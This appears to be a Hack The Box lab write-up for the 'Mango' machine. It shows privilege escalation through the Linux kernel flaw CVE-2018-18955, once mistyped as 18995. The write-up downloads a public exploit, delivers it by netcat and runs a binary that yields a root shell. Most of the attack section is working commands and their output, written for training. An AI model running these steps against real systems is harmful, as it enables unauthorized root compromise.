InfoSec LAB

Mango_Privilege_Escalation_3

Created: 4 min read

CVE-2018-18955

PEAS has discovered that the target system is vulnerable to CVE-2018-18995

a vulnerability classified as critical has been found in linux kernel up to 4.19.1 (Operating System). This affects the function map_write of the file kernel/user_namespace.c of the component Access Control. The manipulation with an unknown input leads to a input validation vulnerability. CWE is classifying the issue as CWE-20. The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. This is going to have an impact on confidentiality, integrity, and availability.

exploit

Exploit found online

mango@mango:/dev/shm$ make ; gcc ; cc
 
Command 'make' not found, but can be installed with:
 
apt install make      
apt install make-guile
 
Ask your administrator to install one of them.
 
 
Command 'gcc' not found, but can be installed with:
 
apt install gcc
Please ask your administrator.
 
 
Command 'cc' not found, but can be installed with:
 
apt install gcc            
apt install clang          
apt install pentium-builder
apt install tcc            
 
Ask your administrator to install one of them.

On the contrary to the PEAS’s claim, there are no compilers within the target system The exploit needs to be compiled remotely

Docker Exploit Development

┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ docker run -it --entrypoint "/bin/bash" --name mango ubuntu:18.04                                                   
root@1a0f56450cf9:/# ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1.6) 2.27
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Setting up the Docker container to match the target environment; Ubuntu 18.04.2 and ldd (Ubuntu GLIBC 2.27-3ubuntu1) 2.27

root@1a0f56450cf9:/# apt update -y ; apt install net-tools netcat nano gcc gcc-multilib make git wget -y ; cd root

Installing the necessary packages

root@1a0f56450cf9:~# wget -q https://github.com/scheatkode/CVE-2018-18955/releases/download/v0.0.1/linux-x86_64.tar.gz ; tar -xf linux-x86_64.tar.gz ; cd linux-x86_64

Downloading the exploit package

root@1a0f56450cf9:~/linux-x86_64# ll
total 56
drwxr-xr-x 3 1001  121 4096 Jan 19  2022 ./
drwx------ 1 root root 4096 sep 29 00:11 ../
drwxr-xr-x 2 1001  121 4096 Jan 19  2022 bin/
-rwxr-xr-x 1 1001  121 2448 Jan 19  2022 exploit.bash_completion.sh*
-rwxr-xr-x 1 1001  121 2693 Jan 19  2022 exploit.cron.sh*
-rwxr-xr-x 1 1001  121 4223 Jan 19  2022 exploit.dbus.sh*
-rwxr-xr-x 1 1001  121 2467 Jan 19  2022 exploit.ldpreload.sh*
-rwxr-xr-x 1 1001  121 3218 Jan 19  2022 exploit.polkit.sh*
-rw-r--r-- 1 1001  121  357 Jan 19  2022 libsubuid.c
-rw-r--r-- 1 1001  121  147 Jan 19  2022 rootshell.c
-rw-r--r-- 1 1001  121 1859 Jan 19  2022 subshell.c
-rw-r--r-- 1 1001  121 6540 Jan 19  2022 subuid_shell.c
 
root@1a0f56450cf9:~/linux-x86_64# ll bin/
total 88
drwxr-xr-x 2 1001 121  4096 Jan 19  2022 ./
drwxr-xr-x 3 1001 121  4096 Jan 19  2022 ../
-rwxr-xr-x 1 1001 121 16408 Jan 19  2022 libsubuid.so*
-rwxr-xr-x 1 1001 121 16792 Jan 19  2022 rootshell*
-rwxr-xr-x 1 1001 121 17272 Jan 19  2022 subshell*
-rwxr-xr-x 1 1001 121 17928 Jan 19  2022 subuid_shell*

While the package contains the source codes, it appears that there already are compiled binaries, so I will try those first

root@1a0f56450cf9:~/linux-x86_64# tar -czf CVE-2018-18955.tar.gz ./bin
root@1a0f56450cf9:~/linux-x86_64# nc 10.10.10.162 2222 < CVE-2018-18955.tar.gz
 
mango@mango:/dev/shm$ nc -nlvp 2222 > CVE-2018-18955.tar.gz
Listening on [0.0.0.0] (family 0, port 2222)
Connection from 10.10.16.8 38318 received!

Delivery complete

Exploitation

mango@mango:/dev/shm$ tar -xf CVE-2018-18955.tar.gz ; cd bin

Unpacking

mango@mango:/dev/shm/bin$ ./subuid_shell 
[.] starting
[.] setting up namespace
[~] done, namespace sandbox set up
[.] mapping subordinate ids
[.] subuid: 165536
[.] subgid: 165536
[~] done, mapped subordinate ids
[.] executing subshell
root@mango:/dev/shm/bin# whoami
root
root@mango:/dev/shm/bin# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
root@mango:/dev/shm/bin# hostname
mango
root@mango:/dev/shm/bin# /sbin/ifconfig -a
lo: flags=8<LOOPBACK>  mtu 65536
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ docker rm mango
mango

Interactive Graph View

Backlinks